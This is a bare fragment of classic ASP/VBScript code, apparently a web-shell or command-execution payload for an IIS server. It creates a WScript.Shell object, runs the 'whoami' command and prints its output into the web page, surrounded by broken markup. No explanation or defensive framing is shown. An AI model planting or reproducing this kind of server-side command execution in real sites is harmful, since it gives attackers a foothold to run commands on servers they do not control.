") Response.write("

")

Set wShell1 = CreateObject("WScript.Shell") Set cmd1 = wShell1.Exec("whoami") output1 = cmd1.StdOut.Readall() set cmd1 = nothing: Set wShell1 = nothing

Response.write(output1) Response.write("

–>